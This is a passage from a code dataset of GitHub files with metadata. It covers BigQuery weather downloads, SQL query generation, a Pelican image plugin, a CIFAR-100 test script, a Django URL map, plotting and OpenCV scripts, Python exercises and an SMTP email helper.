tmax\n FROM\n [bigquery-public-data:ghcn_d.ghcnd_{year}] AS wx\n WHERE\n qflag IS NULL\n AND value IS NOT NULL ) AS wx\nON\n stn.id = wx.id\nWHERE\n latitude > -35 AND latitude < -21\n AND longitude > +15 AND longitude < +35\nGROUP BY\n stn.id,\n stn.name,\n stn.latitude,\n stn.longitude,\n date\nORDER BY\n date;\n'''\n\n\ndef async_query(bigquery,\n project_id,\n query,\n batch=False,\n num_retries=5,\n use_legacy_sql=True):\n job_data = {\n 'jobReference': {\n 'projectId': project_id,\n 'jobId': str(uuid.uuid4())\n },\n 'configuration': {\n 'query': {\n 'query': query,\n 'priority': 'BATCH' if batch else 'INTERACTIVE',\n # Set to False to use standard SQL syntax. 
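# [Editor's aside -- not part of any dataset record] On the LeetCode 2589
# record above: the greedy runs each task as late as possible inside its
# [start, end] window so that later-ending tasks can reuse the same seconds.
# Hand-check with an illustrative input:
#     tasks = [[2, 3, 1], [4, 5, 1], [1, 5, 2]] -> 2 (run seconds 3 and 5;
#     the third task shares both, so it needs no extra time)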
See:\n # https://cloud.google.com/bigquery/sql-reference/enabling-standard-sql\n 'useLegacySql': use_legacy_sql\n }\n }\n }\n return bigquery.jobs().insert(\n projectId=project_id, body=job_data).execute(num_retries=num_retries)\n\n\ndef poll_job(bigquery, job):\n \"\"\"Waits for a job to complete.\"\"\"\n\n print('Waiting for job to finish...')\n\n request = bigquery.jobs().get(projectId=job['jobReference']['projectId'],\n jobId=job['jobReference']['jobId'])\n\n while True:\n result = request.execute(num_retries=2)\n\n if result['status']['state'] == 'DONE':\n if 'errorResult' in result['status']:\n raise RuntimeError(result['status']['errorResult'])\n print('Job complete.')\n return\n\n time.sleep(1)\n\n\ndef main(project_id):\n credentials = GoogleCredentials.get_application_default()\n bigquery = build('bigquery', 'v2', credentials=credentials)\n\n for year in range(1850, 2016):\n print(year)\n try:\n query_string = query_template.format(year=year)\n query_job = async_query(bigquery, project_id, query_string)\n\n poll_job(bigquery, query_job)\n\n page_token = None\n filename = 'sa_weather_{year}.csv'.format(year=year)\n with open(filename, 'wb') as csvfile:\n spamwriter = csv.writer(csvfile)\n while True:\n page = bigquery.jobs().getQueryResults(\n pageToken=page_token,\n **query_job['jobReference']).execute(num_retries=2)\n\n for row in page['rows']:\n spamwriter.writerow([field['v'] for field in row['f']])\n\n page_token = page.get('pageToken')\n if not page_token:\n break\n\n except HttpError as err:\n print('Error: {}'.format(err.content))\n raise err\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('project_id', help='Your Google Cloud Project ID.')\n args = parser.parse_args()\n main(args.project_id)\n","repo_name":"StoCon/pycon2016","sub_path":"download_sa_weather.py","file_name":"download_sa_weather.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32434594613","text":"if __name__ == '__main__':\n \"\"\"\n PLEASE NOTE: There are definitely things that could be better about this.\n It's a one-off for a relatively-obscure use-case. Get over it.\n\n All data needed to generate a SQL file goes into the program_data variable.\n Hierarchically, it looks like this:\n {\n 'categories': [\n {\n 'category_name': 'some_name',\n 'search_columns_override': [\n 'some_column_name_1',\n 'some_column_name_2',\n ],\n 'search_terms': [\n 'search_term_1',\n 'search_term_2',\n ],\n }\n ],\n 'search_columns': [\n 'some_column_name_1',\n 'some_column_name_2',\n ],\n 'naked_columns': [\n 'some_column_name_1',\n 'some_column_name_2',\n ],\n 'from': {\n 'from_clause': 'dbo.MyTable1 AS a LEFT OUTER JOIN dbo.MyTable2 AS b ON a.Key = b.Key',\n 'from_table': 'dbo.MyTable1',\n },\n 'where': 'WHERE a.MyColumn = \"something\"',\n }\n\n Definitions:\n categories: One record per search category.\n category_name: This is the name that will be used in the column names; for example: column_name_contains_category_name.\n search_columns_override: A list of columns to search. If present, overrides the list of search_columns (see below) for this category.\n search_terms: A list of search terms to look for in the column text.\n search_columns: The default columns to search for all categories. 
Overridden at a category level by search_columns_override.\n naked_columns: These columns will be included directly in the query -- so if you need columns such as an ID column to pull through, put them here.\n from: Supply either a from_clause (a COMPLETE SQL FROM clause) or a from_table (the name of a table). If you supply a from_clause,\n keep in mind you MUST prefix all of your column names with a table alias from your FROM clause to avoid name clashes.\n where: A complete WHERE clause. Can safely be omitted.\n\n A note on column names: The column name can either just be a string, or it can be an object:\n {\n 'col_name': 'col_name_1',\n 'col_alias': 'col_alias',\n }\n\n If it's an object, its alias will be used in the outputted column names rather than its full name.\n This can be useful if you have very long column names.\n \"\"\"\n program_data = {\n 'categories': [\n {\n 'category_name': 'messaging',\n 'search_terms': [\n 'chatbot',\n 'social',\n 'messaging'\n ],\n },\n {\n 'category_name': 'platform',\n 'search_terms': [\n 'integration',\n 'apps',\n 'third-party',\n 'third party',\n '3rd party',\n 'extensibility',\n 'objects',\n 'system',\n 'systems',\n ],\n },\n {\n 'category_name': 'reliability',\n 'search_terms': [\n 'outage',\n 'reliability',\n 'stability',\n 'uptime',\n 'downtime',\n 'security',\n 'breach',\n ],\n },\n {\n 'category_name': 'crmification',\n 'search_terms': [\n 'sfa',\n 'sales automation',\n ],\n },\n {\n 'category_name': 'enterprise',\n 'search_terms': [\n 'architecture',\n 'scalability',\n 'itsm',\n 'itil',\n 'sandbox',\n 'ola',\n 'sla',\n ],\n },\n {\n 'category_name': 'other',\n 'search_terms': [\n 'social listening',\n 'social media management',\n 'social media monitor',\n ],\n }\n ],\n 'search_columns': [\n {'col_name': 'account_health_risk_type__c', 'col_alias': 'ahrt'},\n {'col_name': 'description_of_risk__c', 'col_alias': 'dor'},\n {'col_name': 'x2014_renewal_status_notes__c', 'col_alias': 'rsn'},\n {'col_name': 'churn_reason__c', 'col_alias': 'cr'},\n {'col_name': 'competitive_notes__c', 'col_alias': 'cn'},\n ],\n 'naked_columns': [\n 'id',\n 'account_health_risk_type__c',\n 'description_of_risk__c',\n 'x2014_renewal_status_notes__c',\n 'churn_reason__c',\n 'competitive_notes__c',\n ],\n 'from': {\n 'from_table': 'sfdc.account_scd2'\n },\n 'where': \"WHERE dw_eff_end = '9999-12-31'\"\n }\n\n def get_search_columns(category):\n return category['search_columns_override'] if 'search_columns_override' in category else program_data['search_columns']\n\n def get_column_alias(column):\n return column if isinstance(column, str) else column['col_alias']\n \n def get_column_name(column):\n return column if isinstance(column, str) else column['col_name']\n\n def generate_category_variables(categories):\n variables = ''\n for category in categories:\n category_name = category['category_name']\n variables += f\"DECLARE {category_name} STRING;\\n\"\n return variables + '\\n'\n\n def generate_category_variable_values(categories):\n variable_values = ''\n for category in categories:\n category_name = category['category_name']\n search_terms = category['search_terms']\n variable_values += f\"SET {category_name} = r'\\\\b({'|'.join(search_terms)})\\\\b';\\n\"\n return variable_values + '\\n'\n\n def generate_columns_select_list(columns):\n return '\\n'.join([f' {col_name},' for col_name in columns])\n\n def generate_category_search_columns(categories):\n columns = ''\n for category in categories:\n category_name = category['category_name']\n search_columns = 
get_search_columns(category)\n columns += f\"\\n\\n -- Autogenerated columns for category: {category_name}\\n\"\n for col in search_columns:\n col_alias = get_column_alias(col)\n col_name = get_column_name(col)\n columns += f\" REGEXP_CONTAINS(COALESCE(LOWER({col_name}), ''), {category_name}) AS {col_alias}_contains_{category_name},\\n\"\n columns += ' NULLIF('\n columns += '\\n ARRAY_TO_STRING('\n columns += f\"\\n REGEXP_EXTRACT_ALL(COALESCE(LOWER({col_name}), ''), {category_name}),\"\n columns += \"\\n ', '\"\n columns += \"\\n ),\"\n columns += \"\\n ''\"\n columns += f'\\n ) AS {col_alias}_{category_name}_matches,\\n'\n return columns[:-2] + '\\n'\n\n def get_from_clause(data):\n if 'from_clause' in data['from']:\n return f\"\\n {data['from']['from_clause']}\\n\"\n else:\n return f\" FROM {data['from']['from_table']}\\n\"\n\n def generate_initial_flags_cte(data):\n cte = ''\n cte += 'WITH initial_flags AS\\n'\n cte += '(\\n'\n cte += ' SELECT\\n'\n cte += generate_columns_select_list(data['naked_columns'])\n cte += generate_category_search_columns(data['categories'])\n cte += get_from_clause(data)\n cte += f\" {data['where']}\\n\" if 'where' in data else ''\n cte += '),\\n\\n'\n return cte\n\n def generate_category_top_level_columns(categories):\n columns = '\\n'\n for category in categories:\n category_name = category['category_name']\n search_columns = get_search_columns(category)\n columns += f\"\\n -- Autogenerated top-level columns for category: {category_name}\\n\"\n columns += ' ' + \\\n '\\n OR '.join(\n [f\"{get_column_alias(col)}_contains_{category_name}\" for col in search_columns])\n columns += f'\\n AS any_contains_{category_name},\\n'\n columns += ' NULLIF(\\n'\n columns += ' CONCAT(\\n'\n for col in search_columns:\n col_alias = get_column_alias(col)\n col_name = get_column_name(col)\n columns += ' COALESCE(\\n'\n columns += f\" CONCAT('{col_name}: [', {col_alias}_{category_name}_matches, ']\\\\n'),\\n\"\n columns += \" ''\\n\"\n columns += ' ),\\n'\n columns = columns[:-2] + '\\n'\n columns += ' ),\\n'\n columns += \" ''\\n\"\n columns += f' ) AS all_{category_name}_matches,\\n'\n return columns\n\n def generate_initial_flags_column_list(categories):\n columns = ''\n for category in categories:\n category_name = category['category_name']\n search_columns = get_search_columns(category)\n for col in search_columns:\n col_alias = get_column_alias(col)\n columns += f' {col_alias}_contains_{category_name},\\n'\n columns += f' {col_alias}_{category_name}_matches,\\n'\n return columns[:-2] + '\\n'\n\n def generate_aggregate_flags_cte(data):\n cte = ''\n cte += 'aggregate_flags AS\\n'\n cte += '(\\n'\n cte += ' SELECT\\n'\n cte += generate_columns_select_list(data['naked_columns'])\n cte += generate_category_top_level_columns(data['categories'])\n cte += '\\n -- All flag columns from previous CTE\\n'\n cte += generate_initial_flags_column_list(data['categories'])\n cte += ' FROM initial_flags\\n'\n cte += ')\\n\\n'\n return cte\n\n def generate_final_select_statement(data):\n statement = ''\n statement += 'SELECT * FROM aggregate_flags\\n'\n statement += 'WHERE\\n '\n statement += '\\n OR '.join([f\"any_contains_{category['category_name']}\" for category in data['categories']])\n return statement\n\n def write_sql_to_file(sql):\n with open('output.sql', 'w') as file:\n file.write(sql)\n\n final_sql = ''\n final_sql += generate_category_variables(program_data['categories'])\n final_sql += generate_category_variable_values(program_data['categories'])\n final_sql += 
generate_initial_flags_cte(program_data)\n final_sql += generate_aggregate_flags_cte(program_data)\n final_sql += generate_final_select_statement(program_data)\n write_sql_to_file(final_sql)\n","repo_name":"tcc-sejohnson/bigquery-text-search-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7149208104","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nThis pelican plugin is inspired by the plugin [better figures and images](https://github.com/getpelican/pelican-plugins/tree/master/better_figures_and_images) and is intended to be used with the theme [niu-x2-sidebar](https://github.com/mawenbao/niu-x2-sidebar).\n\nTo all the img tags in the html document, this plugin do these things:\n\n * add attributes:\n * width: real width of the image file, in px.\n * if `NIUX2_LAZY_LOAD` is set as True in your pelican configuration:\n * add the following attributes:\n * data-height: real height of the image file, in px.\n * data-width: real width of the image file, in px.\n * add class `lazy`.\n * move attribute `src` to attribute `data-original`.\n\nRequirements:\npip install pillow beautifulsoup4\n\"\"\"\n\nfrom os import path, access, R_OK\nfrom pelican import signals\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nimport logging\nimport re\n\nlogger = logging.getLogger(__name__)\n_width_attr_reg = re.compile(r'[a-z]*$')\n\ndef parse_images(instance):\n if instance._content is None or not 'img' in instance._content:\n return\n\n content = instance._content[:]\n soup = BeautifulSoup(content, \"html.parser\")\n\n for img in soup('img'):\n # Build the source image filename\n my_url2path_func = instance.settings['MY_IMG_URL2PATH_FUNC']\n if not my_url2path_func:\n logger.error('Error: MY_IMG_URL2PATH_FUNC not defined in your pelican configuration.\\n\\\n niux2_lazyload_helper cannot determine the image path from its url.\\n')\n return\n imgPath = my_url2path_func(img['src'])\n if not imgPath:\n return\n if not (path.isfile(imgPath) and access(imgPath, R_OK)):\n logger.error('Error: image file not found: {}'.format(imgPath))\n continue\n\n # Open the source image and query dimensions\n im = Image.open(imgPath)\n imgWidth = im.size[0]\n imgHeight = im.size[1]\n imgResized = False\n\n if not img.get('width'):\n img['width'] = str(imgWidth) + 'px'\n else:\n imgResized = True\n\n # for lazyload.js\n if instance.settings.get('NIUX2_LAZY_LOAD', False):\n if img.get('class'):\n img['class'] += 'lazy'\n else:\n img['class'] = 'lazy'\n img['data-original'] = img['src']\n del img['src']\n if imgResized:\n newImgWidth = int(_width_attr_reg.sub('', img['width']).strip())\n newImgHeight = imgHeight * newImgWidth / imgWidth\n img['data-width'] = str(newImgWidth) + 'px'\n img['data-height'] = str(newImgHeight) + 'px'\n else:\n img['data-width'] = str(imgWidth) + 'px'\n img['data-height'] = str(imgHeight) + 'px'\n\n instance._content = soup.decode()\n\ndef register():\n signals.content_object_init.connect(parse_images)\n\n","repo_name":"sdphome/blog-content","sub_path":"plugins/niux2_lazyload_helper/niux2_lazyload_helper.py","file_name":"niux2_lazyload_helper.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25882946275","text":"import argparse\r\nfrom model import resnet18\r\nfrom torch import optim, nn\r\nimport torchvision\r\nfrom torch.backends import 
cudnn\r\nimport torch  # added: explicit import; the original relied on torch leaking in via 'from utils import *'\r\nimport torchvision.transforms as transforms\r\nimport os\r\nimport sys\r\nfrom tqdm import tqdm\r\nfrom tensorboardX import SummaryWriter\r\nfrom utils import *\r\nfrom torch.autograd import Variable\r\n\r\ndef main(config):\r\n    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n    net_path = config.net_path\r\n    # writer = SummaryWriter(log_dir=config.result_path)\r\n    transform_test = transforms.Compose([\r\n        transforms.ToTensor(),\r\n        transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\r\n    ])\r\n\r\n    testset = torchvision.datasets.CIFAR100(root='./data', train=False, download=False, transform=transform_test)\r\n    testloader = torch.utils.data.DataLoader(testset, batch_size=config.batch_size, shuffle=False, num_workers=2)\r\n\r\n    net = resnet18()\r\n    net.to(device)\r\n    net.load_state_dict(torch.load(net_path))\r\n\r\n    criterion = nn.CrossEntropyLoss()\r\n    val_num = len(testset)\r\n    test_steps = len(testloader)\r\n    epochs = config.num_epochs\r\n    best_acc = 0.0\r\n    for epoch in range(epochs):\r\n        net.eval()\r\n        acc = 0.0\r\n        running_loss = 0.0\r\n        with torch.no_grad():\r\n            val_bar = tqdm(testloader, file=sys.stdout)\r\n            for images, labels in val_bar:\r\n                images = images.to(device)\r\n                labels = labels.to(device)\r\n                output = net(images)\r\n                loss = criterion(output, labels)\r\n\r\n                predict = torch.max(output, dim=1)[1]\r\n                acc += torch.eq(predict, labels).sum().item()\r\n                running_loss += loss.item()\r\n\r\n                val_bar.desc = \"valid epoch[{}/{}]\".format(epoch + 1, epochs)\r\n\r\n        val_acc = acc / val_num\r\n        mean_loss = running_loss / test_steps\r\n        # writer.add_scalar('Test/accuracy', val_acc, epoch + 1)\r\n        # writer.add_scalar('Test/loss', mean_loss, epoch + 1)\r\n        print('[epoch %d] val_loss: %.3f  val_accuracy: %.3f' %\r\n              (epoch + 1, mean_loss, val_acc))  # label fixed: this loss is measured on the test split, not training\r\n\r\n        if val_acc > best_acc:\r\n            best_acc = val_acc\r\n\r\n    print('best accuracy is: {}'.format(best_acc))\r\n\r\n\r\nif __name__ == '__main__':\r\n    os.chdir(sys.path[0])\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('--num_epochs', type=int, default=1)\r\n    parser.add_argument('--batch_size', type=int, default=32)\r\n    parser.add_argument('--lr', type=float, default=0.001)\r\n    parser.add_argument('--result_path', type=str, default='./result')\r\n    parser.add_argument('--aug', type=str, default='baseline')\r\n    parser.add_argument('--net_path', type=str, default='')\r\n    config = parser.parse_args()\r\n\r\n    main(config)","repo_name":"MJzhao621/deep_learning_midterm","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17639401016","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ncreated by huash06 at 2015-07-15 09:02\n\nDefine the beauty of a string as the maximum number of times any character occurs.\nGiven a string, find the shortest substring that does not reduce the beauty.\n\nSample test(s)\n    input\n        5  # number of characters\n        1 1 2 2 1\n    output\n        1 5\n\n    input\n        5\n        1 2 2 3 1\n    output\n        2 3\n\n    input\n        6\n        1 2 2 1 1 2\n    output\n        1 5\n\nAnalysis:\nFind the leftmost position L_i and rightmost position R_i of every character; it suffices for the answer to cover the range [L_i, R_i] of some character i that occurs the maximum number of times.\n\n\"\"\"\n__author__ = 'huash06'\n\nimport os\nimport sys\nimport functools\nimport collections\nimport itertools\n\nN = int(input())\nnums = [int(x) for x in input().split()]\n\ncount = collections.defaultdict(int)\nleft = {}\nright = {}\nfor i, num in enumerate(nums):\n    count[num] += 1\n    if num not in left:\n        left[num] = i\n        # caution: this line was forgotten during the contest\n        right[num] = i\n    else:\n        right[num] = i\n\nbeauty = max(count.values())\n\nres = len(nums)\nl = 1\nr = 
len(nums)\nfor v in filter(lambda x: count[x] == beauty, count.keys()):\n if right[v] - left[v] < res:\n res = right[v] - left[v] + 1\n l = left[v] + 1\n r = right[v] + 1\n\nprint(l, r)\n","repo_name":"shhuan/algorithms","sub_path":"py/codeforces/321_div2_B.py","file_name":"321_div2_B.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42836152110","text":"from django.urls import path, include\n\nfrom forum.views import *\n\n\nurlpatterns = [\n path('', SectionsListView.as_view(), name=\"forum\"),\n path('topics', TopicsListView.as_view(), name=\"all_topics\"),\n path('random', random_topic, name='random_topic'),\n path('section/', TopicsListView.as_view(), name=\"topics\"),\n path('topic/', TopicDetailView.as_view(), name=\"topic\"),\n path('update-post/', PostUpdateView.as_view(), name=\"update_post\"),\n path('delete-post/', PostDeleteView.as_view(), name=\"delete_post\"),\n path('rate-post/', PostScoreChangeView.as_view(), name=\"rate_post\"),\n path('create-post/topic-', PostCreateView.as_view(), name=\"create_post\"),\n path('create-topic/section-', TopicCreateView.as_view(), name=\"create_topic\"),\n path('change-topic/', TopicUpdateView.as_view(), name=\"change_topic\"),\n path('delete-topic/', TopicDeleteView.as_view(), name=\"delete_topic\"),\n path('captcha/', include('captcha.urls'), name='captcha')\n]\n","repo_name":"Gerhei/Plants_catalog","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15133445527","text":"from projectq.backends import CircuitDrawer\nfrom projectq.meta import Dagger\n\nimport projectq.libs.math\nimport projectq.setups.decompositions\nfrom projectq.backends import Simulator, ResourceCounter\nfrom projectq.cengines import (AutoReplacer, DecompositionRuleSet,\n InstructionFilter, LocalOptimizer,\n MainEngine, TagRemover)\n\nfrom projectq.ops import (All, Measure, QFT)\nfrom homemade_code.gateUa import gateUa\nfrom homemade_code.initialisation import initialisation, meas2int, initialisation_n, mod_inv, egcd\nimport math\nfrom time import time\n\ndef run(a=4, N=7, x=2, param=\"count\"):\n \"\"\"\n |b> --> |b+(ax) mod N>\n nb of gate ~454*log2(N)\n :param a: a \"\n__all__ = ['HeatMatrix']\n\nimport math\nimport wx\nimport numpy as np\n\nfrom stars.visualization.utils import GradientColor\nfrom stars.visualization.PlotWidget import PlottingCanvas\n\nclass HeatMatrix(PlottingCanvas):\n def __init__(self,parent, layer, data,**kwargs):\n PlottingCanvas.__init__(self,parent,data)\n \n try:\n self.layer_name = layer.name\n self.title = \"Transition probility matrix (%s)\" % self.layer_name\n self.x_label = \"LISA transition states (1=HH,2=LH,3=LL,4=HL)\"\n self.y_label = \"LISA transition states\"\n self.data = data\n n = len(self.data)\n self.enable_axis_labels = False\n self.enable_axis = True\n self.enable_axis_x = False\n self.enable_axis_y = False\n \n # a NxN matrix\n self.x_min = 1\n self.x_max = n+1 \n self.y_min = 1\n self.y_max = n+1\n \n self.extent = (self.x_min, self.y_min, self.x_max,self.y_max)\n self.selected_polygon_ids = []\n self.status_bar = self.parentFrame.status_bar\n \n self.gradient_color = GradientColor(gradient_type='rdyibu')\n self.margin_right = 100\n \n # color schema: from blue to red\n self.color_matrix = []\n for i in range(n):\n color_row = []\n for j in range(n):\n p = 
                    color_row.append( self.gradient_color.get_color_at(p))\n                self.color_matrix.append(color_row)\n            \n        except Exception as err:\n            self.ShowMsgBox('Failed to init heat map! ' + str(err.message))\n            self.isValidPlot = False\n            self.parentFrame.Close(True)\n            return None\n        \n    def OnClose(self,event):\n        event.Skip()\n        \n    def plot_data(self,dc):\n        # draw an NxN matrix\n        w,h = 1,1\n        for i,row in enumerate(self.data):\n            for j,item in enumerate(row):\n                start_x = j + self.x_min\n                start_y = self.y_max - i\n                \n                pixel_x,pixel_y = self.point_to_screen(start_x,start_y)\n                pixel_w,pixel_h = math.ceil(self.length_to_screen(w)),math.ceil(self.length_to_screen(h,axis=1))\n                \n                brush = wx.Brush(self.color_matrix[i][j])\n                dc.SetBrush(brush)\n                dc.DrawRectangle(pixel_x,pixel_y,pixel_w,pixel_h)\n                \n                if i==len(self.data)-1:\n                    dc.DrawText(str(j+1), pixel_x + pixel_w/2, pixel_y+pixel_h+5)\n                if j==0:\n                    dc.DrawText(str(len(self.data)-i), pixel_x - 10, pixel_y + pixel_h/2)\n                \n                text_pixel_x, text_pixel_y = pixel_x + pixel_w/2.0 - 10, pixel_y + pixel_h / 2.0\n                dc.SetPen(wx.WHITE_PEN)\n                dc.SetBrush(wx.WHITE_BRUSH)\n                dc.DrawText('%.4f'%(self.data[i][j]), text_pixel_x,text_pixel_y) \n        \n        # draw a legend bar\n        pixel_x,pixel_y = self.point_to_screen( start_x+w, self.y_max)\n        pixel_x += 20\n        pixel_h = self.length_to_screen(self.y_max-self.y_min,axis=1)\n        pixel_w = 20\n        \n        gradient_colorbar = self.gradient_color.get_bmp(pixel_w, pixel_h)\n        dc.DrawBitmap( gradient_colorbar, pixel_x, pixel_y)\n        \n        pixel_x = pixel_x + pixel_w + 10\n        dc.SetPen(wx.BLACK_PEN)\n        dc.DrawText(str('%.2f'% np.max(self.data)), pixel_x,pixel_y)\n        pixel_y = pixel_y + pixel_h - 12 \n        dc.DrawText(str('%.2f'% np.min(self.data)), pixel_x,pixel_y)\n","repo_name":"GeoDaCenter/CAST","sub_path":"stars/visualization/plots/HeatMatrix.py","file_name":"HeatMatrix.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"}
{"seq_id":"6677435907","text":"# Destructor method\n# class Person:\n#     def __del__(self):\n#         print(\"Destroying object {0}\".format(self))\n# p1 = Person()\n# p2 = Person()\n\n# del p2\n# print(\"program\")\n\n\n# class Person:\n#     def say_hai(self):\n#         print(\"hello\")\n\n#     def say_hai(self, name):\n#         print(\"hello:\", name)\n\n# class Person:\n#     def work(self):\n#         print(\"Working hard!\")\n\n# def play_ganme(s):\n#     print(\"{0} is playing a game\".format(s))\n\n# Person.play = play_ganme\n# p = Person()\n# p.work()\n# p.play()\n\n# Test private attributes\n\n# class Employee:\n#     def __init__(self,name,age):\n#         self.name = name\n#         self.__age = age\n#     def __work(self):\n#         print(\"Work hard and make money!\")\n#         print(\"Age: {0}\".format(self.__age))\n\n# e = Employee(\"搞起\", 18)\n# print(e.name)\n\n# print(e._Employee__age)\n# print(dir(e))\n# e._Employee__work()\n\n# Test the usage of @property\n\n# class Employee:\n#     @property\n#     def salary(self):\n#         print(\"salary run...\")\n#         return 10000\n\n# empl = Employee()\n# print(empl.salary)\n\n# Usage\n\nclass wsz:\n    def __init__(self,name ,salary):\n        self.__name = name\n        self.__salary = salary\n\n    @property\n    def salary(self):\n        return self.__salary\n\n    @salary.setter\n    def salary(self):\n        if 1000' \n        msg['To'] = data['recipient_name'] + ' <' + data['recipient_email'] + '>'\n        #msg['To'] = \"Felix Werner \"\n        plain_msg = data['plain_body']\n        html_msg = data['body']\n\n\n        msg.attach(MIMEText(plain_msg, 'plain'))\n        msg.attach(MIMEText(html_msg, 'html'))\n\n        mailserver = self.__establish_connection()\n\n        mailserver.sendmail(self.user_email, data['recipient_email'], msg.as_string())\n        print(\"Sleep 5 seconds.\")\n        
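# --- Illustrative aside (not part of the original corpus file) ---
# A minimal sketch of the multipart/alternative pattern the method above
# relies on: attach the plain-text part first, then the HTML part, so capable
# clients render HTML and others fall back to plain text. All names and
# addresses below are made up; nothing is actually sent.
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

demo = MIMEMultipart('alternative')
demo['Subject'] = 'Demo'
demo['From'] = 'Sender <sender@example.com>'      # hypothetical address
demo['To'] = 'Recipient <recipient@example.com>'  # hypothetical address
demo.attach(MIMEText('plain fallback', 'plain'))  # least-preferred part first
demo.attach(MIMEText('<b>rich body</b>', 'html'))
print(demo.as_string()[:60])  # inspect the serialized message instead of sending it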
time.sleep(5)\n        \n        mailserver.quit()\n\n    def __establish_connection(self):\n        mailserver = smtplib.SMTP(self.smtp_server ,self.smtp_port)\n        mailserver.set_debuglevel(1)\n        # identify ourselves to smtp gmail client\n        mailserver.ehlo()\n        # secure our email with tls encryption\n        mailserver.starttls()\n        # re-identify ourselves as an encrypted connection\n        mailserver.ehlo()\n        mailserver.login(self.user_email, self.user_pw)\n\n        return mailserver","repo_name":"dnberlin/holy_crm","sub_path":"holy_crm/email_handler.py","file_name":"email_handler.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"30822130774","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.fftpack import fft\n\nFs = 1200  # Sample frequency\nN = 300  # Number of sample points\nT = 1.0 / Fs\nt = np.linspace(T, N * T, N)\n\n# I Component\nf1 = 130\nx1 = np.sin(f1 * 2.0 * np.pi * t)\n\n# II Component\nf2 = 288\nx2 = np.sin(f2 * 2.0 * np.pi * t)\n\n# Complete Component\nx = x1 + x2\n\n# Display\nplt.figure(1)\nplt.plot(t, x)\nplt.grid()\nplt.xlabel('Time(s)')\nplt.ylabel('Amplitude')\ntitle = \"\\sin(2 \\omega {} t) + \\sin(2 \\omega {} t)\".format(f1, f2)\nplt.title(\"$x(t) = {}$\".format(title))\nplt.show()\n","repo_name":"SKantar/SignalProcessing","sub_path":"01_task/00_subtask.py","file_name":"00_subtask.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"2360800883","text":"#!/usr/bin/env python3\n\n\"\"\"\nIMPORTS\n\"\"\"\n#import the necessary packages\nimport imutils\nimport cv2\nimport time\n\n\"\"\"\nFUNCTION DEFINITION\n\"\"\"\n\ndef pre_process(img):\n    #convert to gray\n    gray = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n    #blur it\n    blur = cv2.GaussianBlur(gray,(5,5),0)\n    #threshold it\n    _,thresh = cv2.threshold(blur,60,255,cv2.THRESH_BINARY)\n    return thresh\n\ndef contours(thresh_img):\n    cnts = cv2.findContours(thresh_img.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n    cnts = imutils.grab_contours(cnts)\n    return cnts\n\ndef contour_plot(img):\n\n    thresh_img = pre_process(img) #getting the thresholded image\n    cnts = contours(thresh_img) #getting the contours\n\n    #loop over the contours\n    for c in cnts:\n        #compute the center of contours\n        # print(\"start of the loop\")\n        M =cv2.moments(c)\n        cX = int(M[\"m10\"]/M[\"m00\"])\n        cY = int(M[\"m01\"]/M[\"m00\"])\n        #\n        #draw the contour and center of the shape on the image\n        cv2.drawContours(img,[c],-1,(0,255,0),2)\n        cv2.circle(img,(cX,cY),7,(255,255,255),-1)\n        cv2.putText(img,\"center\",(cX-20,cY-20),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255),2)\n        cv2.imshow('output',img)\n        # cv2.waitKey(0)\n\n    # cv2.imshow('output',thresh_img)\n    cv2.waitKey(0)\n    print(\"reached the end of the program\")\n    cv2.destroyAllWindows()\n\n\"\"\"\nMAIN CODE\n\"\"\"\nimg = cv2.imread('xxxxx') #path to file\ncontour_plot(img)\n","repo_name":"karry3775/OPEN_CV","sub_path":"Contour_plot.py","file_name":"Contour_plot.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"10458580601","text":"from __future__ import absolute_import, division, print_function\nfrom collections import defaultdict\nimport math\nimport itertools\nimport re\nimport sys\n\nimport etce.timeutils\nfrom etce.utils import nodestr_to_nodelist,daemonize\nfrom etce.eelsequencer import EELSequencer\nfrom etce.wrapper 
